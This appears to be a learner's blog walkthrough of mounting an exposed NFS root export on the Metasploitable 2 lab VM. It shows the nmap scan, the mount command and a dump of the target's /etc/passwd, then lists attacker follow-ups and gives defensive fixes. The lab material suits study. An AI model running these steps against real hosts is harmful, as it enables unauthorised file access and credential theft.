I'm currently learning cybersecurity with the goal of becoming a penetration tester and eventually joining a red team. Every day I set aside time to practice on real vulnerable machines — and today was one of those days where something just clicked.
I was doing a basic Nmap scan on Metasploitable 2 when I spotted port 2049 open. That's NFS — Network File System. I'd read about it before but never actually exploited it. So I decided to dig in. What happened next honestly surprised me.
I ran two commands. And suddenly, the entire filesystem of the target machine was sitting right there on my Kali machine. All the folders. All the files. No password. No login. Nothing. That moment when I ran ls and saw all those directories appear — that feeling was something else. Like, it actually worked.
Let me walk you through exactly what I did.
What is NFS and why does it matter?
NFS (Network File System) is a protocol that lets one machine share its folders with other machines over a network. Think of it like a shared drive — one computer puts files in, others can access them remotely.
The problem is when it's misconfigured. On a properly secured system, NFS shares are locked down to specific IP addresses and require authentication. On Metasploitable 2 — which is intentionally vulnerable — NFS exposes the entire root filesystem (/) to anyone on the network. No questions asked.
Lab setup
Here's what I was working with:
- Kali Linux — my attacker machine
- Metasploitable 2 — the target, IP:
192.168.56.102 - Both running as VMs on VirtualBox, connected via host-only network
Step 1 — Scanning with Nmap
I started with a basic Nmap scan. Nothing fancy, just the default:
nmap 192.168.56.102
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-13 14:27 EDT
Nmap scan report for 192.168.56.102
Host is up (0.027s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.64 seconds23 open ports. Metasploitable 2 is basically a hacker's playground. For this session I focused on port 2049 — NFS. Here's a quick breakdown of the most interesting ports from a red team perspective:
PortServiceWhy it's interesting2049nfsOur target — exposed filesystem21ftpOften allows anonymous login23telnetUnencrypted remote access3306mysqlDatabase, default creds often work5900vncRemote desktop access6667ircUnrealIRCd backdoor vulnerability8180unknownApache Tomcat running here
Step 2 — Creating a mount point
Before I could mount the remote share, I needed an empty local directory to mount it to. I created one in /tmp:
mkdir /tmp/metasploit-nfsThis is just an empty folder on my Kali machine. It's going to act as the "door" through which the target's files will appear.
Step 3 — Mounting the target's filesystem
This is the one command that does all the heavy lifting:
sudo mount -t nfs 192.168.56.102:/ /tmp/metasploit-nfsBreaking it down — -t nfs tells Linux this is an NFS mount, 192.168.56.102:/ means we're mounting the root (/) of the target machine, and /tmp/metasploit-nfs is where it appears on my machine.
I confirmed it worked with:
df -h | grep metasploit
192.168.56.102:/ 7.0G 1.5G 5.2G 22% /tmp/metasploit-nfsThere it was. The target's entire 7GB filesystem, mounted on my machine.
Step 4 — Browsing the files
I ran ls /tmp/metasploit-nfs and that's when it hit me. All the folders were just there — /etc, /home, /var, /root, everything. I was looking at another machine's entire filesystem from my terminal. No login. No authentication. Just open.
Step 5 — Reading /etc/passwd
The first thing any attacker would go for is /etc/passwd — the file that lists every user account on the system. I ran:
cat /tmp/metasploit-nfs/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
rishi:x:1003:1003:rishik nelluri,,,:/home/rishi:/bin/bashWhy this is serious: Every username on the system is now visible — msfadmin, postgres, mysql, tomcat55. A real attacker would use these for brute force attacks or credential stuffing. And we got all of this without ever logging into the machine.
Real-world impact
This isn't just a CTF trick. Misconfigured NFS shares have been found on real corporate networks. With this level of access an attacker could:
- Steal SSH private keys from
/home/user/.ssh/ - Read database passwords stored in config files
- Plant malicious files on the system (NFS allows writes too)
- Fully compromise the machine without ever logging in
How to defend against this
Fix: Never export / in your NFS config. In /etc/exports, only share specific directories and restrict access by IP. Always use the root_squash option and firewall port 2049 from untrusted networks.
What's next
This was just one of 23 open ports on Metasploitable 2. I'm planning to go through the rest — FTP anonymous login, the UnrealIRCd backdoor, VSFTPd 2.3.4, and more. Each one is a new technique to learn.
If you're also learning cybersecurity and want to follow along, I'll be posting each attack as I work through them. We're all just trying to get better one port at a time.
Written by Rishik · Aspiring penetration tester · Metasploitable 2 series